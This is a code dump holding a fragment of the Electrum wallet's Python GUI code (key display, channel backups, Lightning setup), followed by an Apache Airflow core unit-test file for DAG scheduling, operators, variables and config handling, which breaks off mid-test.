self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
def lightning_status(self):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
status = _('Enabled')
else:
status = _('Enabled, non-recoverable channels')
else:
if self.wallet.can_have_lightning():
status = _('Not enabled')
else:
status = _("Not available for this wallet.")
return status
def on_lightning_status(self, root):
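        # Callback for the lightning status entry: explain why existing channels are not
        # recoverable from seed, or offer to create lightning keys if the wallet supports them.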
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
pass
else:
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
self.show_info(msg)
elif self.wallet.can_have_lightning():
root.dismiss()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
d = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
d.open()
def _enable_lightning(self, b):
if not b:
return
self.wallet.init_lightning(password=self.password)
self.show_info(_('Lightning keys have been initialized.'))
test_core.py
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep, time
from bs4 import BeautifulSoup
from airflow.executors import SequentialExecutor
from airflow.models import DagModel, Variable, TaskInstance, DagRun
from airflow import jobs, models, DAG, utils, settings, exceptions
from airflow.models import BaseOperator, Connection, TaskFail
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.utils.file import TemporaryDirectory
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from airflow.exceptions import AirflowException
from airflow.configuration import (
AirflowConfigException, run_command, conf, parameterized_config, DEFAULT_CONFIG
)
from jinja2.exceptions import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
from tests.test_utils.config import conf_vars
if six.PY2:
# Need `assertWarns` back-ported from unittest2
import unittest2 as unittest
else:
import unittest
NUM_EXAMPLE_DAGS = 24
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle # type: ignore
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
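        # Note: 'self' is absorbed into *args here; the operator is a no-op when executed.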
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
session = Session()
session.query(DagRun).filter(
DagRun.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with self.assertWarns(PendingDeprecationWarning) as cm:
task = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
assert task, "The task should be created."
warning = cm.warning
assert "Invalid arguments were passed to BashOperator " \
"(task_id: test_illegal_args). Support for passing such arguments will be dropped " \
"in Airflow 2.0. Invalid arguments were:\n" \
"*args: ()\n" \
"**kwargs: {'illegal_argument_1234': 'hello?'}" == warning.args[0]
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
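        # Use a sleep duration unique to this test process so the orphaned 'sleep' child
        # can be identified by its command line further down.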
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_existing_value_to_blank(self):
test_value = 'Some value'
test_key = 'test_key'
Variable.set(test_key, test_value)
Variable.set(test_key, '')
self.assertEqual('', Variable.get('test_key'))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
        # Check that both the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = parameterized_config(DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'fernet_key'): None}):
with self.assertRaises(AirflowConfigException) as cm:
conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date, utc_now)
def test_trigger_dagrun_with_str_execution_date(self):
utc_now_str = timezone.utcnow().isoformat()
self.assertIsInstance(utc_now_str, six.string_types)
run_id = 'trig__' + utc_now_str
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now_str,
